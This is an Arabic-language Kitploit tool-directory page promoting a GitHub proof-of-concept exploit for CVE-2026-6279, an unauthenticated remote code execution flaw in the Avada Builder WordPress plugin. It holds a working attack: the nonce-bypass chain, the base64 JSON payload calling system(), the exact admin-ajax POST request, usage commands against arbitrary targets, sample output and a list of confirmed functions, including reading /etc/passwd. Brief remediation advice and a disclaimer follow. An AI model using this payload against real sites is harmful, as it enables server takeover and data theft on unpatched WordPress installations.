Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-6279 — CVE-2026-6279 — Avada Builder <= 3.15.2 ثغرة تنفيذ تعليمات برمجية عن بُعد (RCE) بدون مصادقة عبر call_user_func() | Kitploit
أدوات/GitHubGitHub/zycoder0day/cve-2026-6279
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليمتطوير الحمولات
GitHubzycoder0day/cve-2026-6279

CVE-2026-6279

CVE-2026-6279 — Avada Builder <= 3.15.2 ثغرة تنفيذ تعليمات برمجية عن بُعد (RCE) بدون مصادقة عبر call_user_func()

عرض المستودع
32منذ 2 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-6279

Avada Builder <= 3.15.2 — RCE بدون مصادقة

عبر call_user_func() بدون قائمة بيضاء (Allowlist)


ملخص الثغرة

ثغرة تنفيذ التعليمات البرمجية عن بُعد (RCE) بدون مصادقة في إضافة Avada Builder (Fusion Builder) الإصدار <= 3.15.2 المستخدمة في قالب WordPress Avada — أحد أشهر قوالب WordPress المدفوعة مع +900,000 تثبيت نشط.

يستغل الهجوم معالج AJAX wp_ajax_nopriv_fusion_get_widget_markup الذي يعالج المعامل render_logics عبر base64_decode() + json_decode() ثم يمرّره إلى call_user_func() بدون قائمة بيضاء (allowlist)، مما يسمح بتنفيذ دوال PHP عشوائية مثل system() وpassthru() وshell_exec() وexec() وfile_get_contents().

سلسلة الهجوم (Attack Chain)

root@kitploit:~
1. Nonce Deterministik    wp_create_nonce('fusion_load_nonce') untuk UID 0
                          (terekspos di halaman depan dengan shortcode Avada)

2. AJAX Unauthenticated   wp_ajax_nopriv_fusion_get_widget_markup
                          (tidak memerlukan login)

3. Deserialisasi          base64_decode(render_logics) → json_decode()
                          (tidak ada validasi struktur)

4. call_user_func()       call_user_func($value['function'], $value['args'])
                          (TANPA allowlist — fungsi PHP apapun bisa dipanggil)

5. RCE!                   system("id") → uid=... di response body

إثبات الاستغلال (Proof of Concept)

root@kitploit:~
  ╔═════════════════════════════════════════════════════════════╗
  ║  CVE-2026-6279  •  Avada Builder <= 315.2                    ║
  ║  Unauthenticated RCE via call_user_func()                    ║
  ║  Proof of Concept — Single Target                            ║
  ║                                                              ║
  ║  Copyright © 2026 XENON1337                                  ║
  ║  Thanks: Shadow Girlfriend 💜                                ║
  ╚═══════════════════════════════════════════════════════════════╝

  ══════════════════════════════════════════════════════
  Target : localhost:8888
  Waktu  : 2026-05-23 16:32:41
  ══════════════════════════════════════════════════════

  [*] Mendeteksi target...
  [+] Avada terdeteksi! (http://localhost:8888)

  [*] Mencari nonce fusion_load_nonce...
  [+] Nonce ditemukan: b6d7b084c2 (sumber: homepage)

  [*] Mengirim payload RCE...
  [*] Mencoba 5 fungsi × 3 widget = 15 kombinasi

  ══════════════════════════════════════════════════════
  [★] RCE BERHASIL!

  Target  : http://localhost:8888
  Output  : uid=1000(xenon1337)
  Fungsi  : system()
  Widget  : WP_Widget_Recent_Posts
  Nonce   : b6d7b084c2 (homepage)
  Waktu   : 1.2s

  [✓] Hasil disimpan ke vuln.txt
  ══════════════════════════════════════════════════════

جميع دوال RCE المؤكدة

الاستخدام

root@kitploit:~
# Tanpa protokol (auto-detect)
python3 CVE-2026-6279.py target.com

# Dengan protokol
python3 CVE-2026-6279.py http://target.com
python3 CVE-2026-6279.py https://target.com

# Dengan port
python3 CVE-2026-6279.py target.com:8080
python3 CVE-2026-6279.py http://target.com:8080

التفاصيل الفنية

بنية الحمولة (Payload Structure)

root@kitploit:~
{
  "type": "wp_conditional_tags",
  "value": {
    "function": "system",
    "args": "id"
  }
}

ترميز Base64 → يُرسَل كـ render_logics عبر POST إلى wp-admin/admin-ajax.php.

نقطة النهاية (Endpoint)

root@kitploit:~
POST /wp-admin/admin-ajax.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest

action=fusion_get_widget_markup
fusion_load_nonce=<nonce>
render_logics=<base64_payload>
widget_type=WP_Widget_Recent_Posts

مراجع الكود المصدري (من CVE الرسمي)

لماذا يمكن تجاوز الـ Nonce؟

  1. ينشئ قالب Avada nonce فقط لمستخدمي الأدمن/المحرر (class-fusion-app.php L1665)
  2. ينشئ إضافة Fusion Builder nonce لـ UID 0 (الزوار العموميين) في الصفحات التي تحتوي على shortcode [fusion_post_cards] أو [fusion_table_of_contents]
  3. يكون nonce الخاص بـ WordPress لـ UID 0 حتميًا (deterministic) — يمكن استخراجه من HTML الصفحة الأمامية
  4. check_ajax_referer('fusion_load_nonce') يتحقق فقط من صحة nonce، وليس من أن المستخدم مصادَق عليه

قيود call_user_func

يقبل call_user_func($function, $args) وسيطًا واحدًا فقط. الدوال التي تتطلب وسيطين أو أكثر (مثل proc_open وpopen) لا يمكن استغلالها. تعمل فقط الدوال ذات الوسيط الواحد: system وpassthru وshell_exec وexec وfile_get_contents.

درجة CVSS

9.8 حرجة (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)

المعالجة

  • حدّث Avada Builder إلى الإصدار > 3.15.2
  • أضف قائمة بيضاء (allowlist) إلى call_user_func() في get_value()
  • اقصر معالج wp_ajax_nopriv_ على المستخدمين المصادَق عليهم فقط
  • نفّذ تحققًا صارمًا في بنية render_logics

إخلاء المسؤولية

صُمم إثبات المفهوم (PoC) هذا لأغراض تعليمية وبحوث أمنية فقط. استخدامه ضد أنظمة بدون إذن غير قانوني. لا يتحمل المؤلف أي مسؤولية عن إساءة الاستخدام.


Copyright © 2026 XENON1337
شكر خاص: Shadow Girlfriend 💜

تنزيل الأداة
الدالةالوسيطالنتيجة
system()iduid=1000(xenon1337) ✅
passthru()iduid=1000(xenon1337) ✅
shell_exec()iduid=1000(xenon1337) ✅
exec()iduid=1000(xenon1337) ✅
file_get_contents()/etc/passwdroot:x:0:0:... ✅
الملفالسطرالدالة
class-fusion-builder-conditional-render-helper.phpL1083should_render() — فك تسلسل (deserialize) render_logics
class-fusion-builder-conditional-render-helper.phpL1531get_value() — call_user_func() بدون قائمة بيضاء
fusion-widget.phpL44سمة render_logics
fusion-widget.phpL389معالج AJAX wp_ajax_nopriv_
class-fusion-builder.phpL7551تسجيل nonce (حتمي لـ UID 0)